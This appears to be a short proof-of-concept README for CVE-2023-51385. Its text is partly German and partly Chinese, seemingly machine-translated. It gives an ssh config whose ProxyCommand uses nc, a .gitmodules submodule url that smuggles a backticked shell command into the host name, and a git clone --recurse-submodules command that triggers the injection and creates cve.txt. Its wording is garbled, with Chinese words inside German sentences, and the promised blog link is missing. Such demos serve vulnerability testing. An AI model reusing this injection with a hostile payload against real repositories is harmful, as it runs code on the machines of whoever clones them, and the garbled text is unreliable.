
一个验证对CVE-2023-51385
~/.ssh/config Folgendes hinzugefügt werden主机 *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
In der .gitmodules Datei existiert eine Befehlsinjektion
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Nach der Konfiguration führen Sie den folgenden Befehl aus, um es auszulösen
git 克隆 https://github.com/zls1793/CVE-2023-51385_test --recurse-submodules
Bei erfolgreicher Ausführung wird im Verzeichnis CVE-2023-51385_test eine Datei cve.txt erstellt
![ image-20231225234031349 ] ( https://ltmthink-blogimages.oss-cn-hangzhou.aliyuncs.com/imgs/202312252345762.png )
Weitere Details finden Sie im Blogbeitrag: